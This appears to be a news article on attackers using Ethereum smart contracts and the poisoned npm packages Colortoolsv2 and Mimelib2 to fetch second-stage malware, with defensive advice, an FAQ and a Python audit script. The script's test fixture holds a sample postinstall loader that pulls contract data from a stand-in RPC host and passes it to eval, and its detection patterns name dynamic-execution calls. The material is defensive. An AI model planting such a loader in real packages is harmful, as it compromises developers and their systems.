Ethereum smart contracts malware delivery
BlockAI — Hackers have begun using Ethereum smart contracts to hide and fetch malicious code, security researchers warn. The campaign, detected in 2024 and active into 2025, uses poisoned npm packages as loaders that fetch second-stage payloads via blockchain references. ReversingLabs and other firms tracked the method, which targets developers and, by extension, crypto exchanges and service providers.
The core tactic uses Ethereum smart contracts as a hosting or retrieval mechanism for a secondary payload. By embedding blockchain references, attackers make malware delivery harder to detect with traditional security tools. This delivery pattern exploits trust in open-source components and leverages chain immutability to deliver commands and artifacts.
Stopping npm package poisoning
Attackers relied on npm package poisoning, publishing malicious modules like Colortoolsv2 and Mimelib2 with realistic commit histories and fake community activity. These packages act as loaders that trigger the blockchain calls. Because npm package poisoning is a supply chain attack, developers who install dependencies can unwittingly enable the malware delivery flow.
Open-source software security
Improving open-source software security requires scanning dependencies, verifying maintainers, and monitoring behavior at install time. Teams should treat any unexpected blockchain calls as red flags. Automated checks that flag packages referencing external smart contracts can interrupt this type of malware delivery before it reaches developer machines or CI pipelines.
Colortoolsv2 and Mimelib2
ReversingLabs identified Colortoolsv2 and Mimelib2 as carriers used to initiate the scheme. Both modules appeared benign but contained code that resolved an Ethereum smart contract address and downloaded an encrypted second-stage payload. Analysts say the embedded contract references and interactions point to a sophisticated, deliberate supply chain attack rather than opportunistic malware.
Lazarus Group ties
Attribution is complex, but the campaign’s infrastructure and operational tempo align with DPRK-linked groups like the Lazarus Group. When attackers leverage blockchain-hosted payloads, the risk broadens: stolen keys, exchange access, and trafficking of funds can follow the initial compromise. Crypto exchanges and custodians are watching these techniques closely.
What defenders should do next
Mitigation is straightforward in principle: lock down dependency policies, add blockchain-call detection to package audits, and use reproducible builds. Threat intel sharing between projects and exchanges can speed takedown and remediation. Remember that attackers will pivot, so a layered approach to supply chain security is essential against future attempts to deliver malware through Ethereum smart contracts.
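As an added example (not code from the article or from ReversingLabs), a small Python audit of an unpacked npm package that implements the checks described under open-source software security and mitigation: it flags install-time lifecycle hooks, declared blockchain client libraries, hard-coded addresses used with chain calls, and chain-fetched data reaching dynamic execution. The two sample packages, the placeholder contract address and the library and RPC method names it matches on are constructed for this example.

```python
import json
import re

# Constructed sample packages standing in for unpacked npm tarballs (path -> contents).
# They are NOT the real Colortoolsv2 or Mimelib2 contents; the address is a placeholder.
SUSPECT_PACKAGE = {
    "package.json": json.dumps({
        "name": "color-helpers-demo", "version": "1.0.0",
        "scripts": {"postinstall": "node setup.js"},
        "dependencies": {"ethers": "^6.0.0"},
    }),
    "setup.js": (
        "const { ethers } = require('ethers');\n"
        "const addr = '0x0123456789abcdef0123456789abcdef01234567';\n"
        "const p = new ethers.JsonRpcProvider('https://rpc.example.invalid');\n"
        "p.call({ to: addr, data: '0x' }).then(d => eval(decode(d)));\n"
    ),
}
CLEAN_PACKAGE = {
    "package.json": json.dumps({"name": "tiny-math", "scripts": {"test": "jest"}}),
    "index.js": "module.exports = (x) => x * 2;\n",
}
WEB3_LIBS = {"web3", "ethers", "viem"}                    # common JS chain clients
LIFECYCLE = ("preinstall", "install", "postinstall", "prepare")
ADDRESS = re.compile(r"\b0x[0-9a-fA-F]{40}\b")             # 20-byte EOA/contract address
CHAIN_CALL = re.compile(r"\beth_(call|getCode|getStorageAt|getLogs)\b|JsonRpcProvider|\.call\(\s*\{")
DYNAMIC_EXEC = re.compile(r"\beval\(|new Function\(|child_process|vm\.runIn")

def audit_package(files):
    """Return (severity, message) findings for one unpacked package."""
    findings = []
    manifest = json.loads(files.get("package.json", "{}"))
    scripts = manifest.get("scripts", {})
    for hook in (h for h in LIFECYCLE if h in scripts):   # code that runs on `npm install`
        findings.append(("medium", f"lifecycle hook '{hook}' runs: {scripts[hook]}"))
    deps = set(manifest.get("dependencies", {})) | set(manifest.get("devDependencies", {}))
    web3 = deps & WEB3_LIBS
    if web3:
        findings.append(("low", f"blockchain client libraries declared: {sorted(web3)}"))
    for path, text in files.items():
        if path == "package.json":
            continue
        addrs = sorted(set(ADDRESS.findall(text)))
        talks_to_chain = bool(CHAIN_CALL.search(text)) or any(lib in text for lib in web3)
        if addrs and talks_to_chain:   # address resolved and queried on-chain: the loader pattern
            findings.append(("high", f"{path}: chain calls against address(es) {addrs}"))
        if talks_to_chain and DYNAMIC_EXEC.search(text):   # fetched data reaches eval/child_process
            findings.append(("critical", f"{path}: chain-fetched data flows into dynamic execution"))
    return findings
```

Run it against each unpacked dependency in a pre-install or CI step and fail the build on any high or critical finding.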
Frequently asked questions about Ethereum smart contracts malware delivery (FAQ)
Q: How do Ethereum smart contracts enable malware delivery?
A: Attackers embed references to smart contracts in malicious packages. The package calls the contract or fetches data tied to the contract, which then leads to a second-stage payload — enabling off-chain retrieval and command and control.
Q: Which packages were involved?
A: Security teams flagged Colortoolsv2 and Mimelib2 as examples of npm package poisoning used to execute this supply chain attack.
Q: Who is responsible?
A: Analysts point to DPRK-linked actors, with indicators consistent with the Lazarus Group, though attribution can be provisional.
Sources for this article
ReversingLabs, 2025. Analysis of npm package poisoning and blockchain-based malware delivery. ReversingLabs technical report.